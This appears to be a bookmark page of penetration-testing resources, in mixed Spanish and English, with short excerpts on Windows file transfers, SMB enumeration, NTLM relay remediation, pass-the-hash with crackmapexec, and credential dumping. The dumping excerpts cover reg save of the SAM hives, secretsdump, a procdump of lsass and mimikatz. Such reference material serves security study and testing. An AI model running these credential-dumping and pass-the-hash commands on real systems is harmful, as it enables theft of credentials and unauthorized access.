https://academy.hackthebox.com/course/preview/file-transfers/windows-file-transfer-methods PowerShell DownloadFile Method We can specify the class name Net.WebClient and the method DownloadFile with the parameters corresponding to the URL of the target file to download and the output file name. File Download PowerShell DownloadString – Fileless Method As we previously discussed,… Read more ›

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smbhttps://github.com/ShawnDEvans/smbmap Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”

https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name… Read more ›

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/ Crackmapexec cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.localSMB         10.0.0.20     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB         10.0.0.20… Read more ›

https://pure.security/dumping-windows-credentials/ Registros C:> reg.exe save hklm\sam c:\temp\sam.saveC:> reg.exe save hklm\security c:\temp\security.saveC:> reg.exe save hklm\system c:\temp\system.save Password Hashes (Impacket) $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Credenciales en memoria (Procdump) C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 C:> mimikatz.exe… Read more ›